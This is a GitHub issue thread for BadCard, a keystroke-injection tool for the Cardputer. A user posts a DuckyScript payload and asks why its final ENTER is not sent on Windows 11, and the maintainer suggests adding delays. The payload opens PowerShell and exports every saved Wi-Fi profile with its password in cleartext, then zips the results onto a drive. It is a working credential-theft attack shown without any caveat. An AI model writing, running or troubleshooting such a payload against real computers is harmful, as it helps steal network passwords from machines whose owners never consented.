### ISSUE TITLE
Payload Issue - After String No Enter

### ISSUE THREAD

**Issue by Velocity-50** [VoidNoi/BadCard#3]
So I have an issue with executing a payload with BadCard. 
Whenever I execute this payload:
```
DELAY 500
WINDOWS r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 500
STRING $u=(gc env:\userprofile).value+'\WG '+ (Get-Date -Format FileDateTime); $f=ni -Path $u -ItemType Directory -EA 0; netsh wlan export profile key=clear folder=$($f.FullName); Compress-Archive -Path $f.FullName -DestinationPath "D:\WP\WP.zip";
DELAY 1000
ENTER
```
It will put the last string in powershell but it wont press enter. 
How can I fix this?

**Comment by VoidNoi** [comment]
I've tested this on linux and works perfectly, what OS are you using?

**Comment by Velocity-50** [comment]
I am sending the code via a Cardputer onto a Windows 11 machine.

**Comment by VoidNoi** [comment]
Try adding a DELAY 500 at the end of the payload. Windows 11 is known to have a lot of drivers issues, we discovered it affects cardputer too unfortunately in this issue https://github.com/VoidNoi/BadCard/issues/1#issuecomment-2000571655. This is mentioned in the README.
> If you're having trouble executing your payloads on Windows 11 try adding a DELAY 500 at the end of your payload https://github.com/VoidNoi/BadCard/issues/1#issuecomment-2000571655

**Comment by Velocity-50** [comment]
I have already tried that and that didnt work. I made the delay 1000 which also didnt work.

**Comment by VoidNoi** [comment]
Then there's nothing I can do unfortunately since it's a windows 11 issue
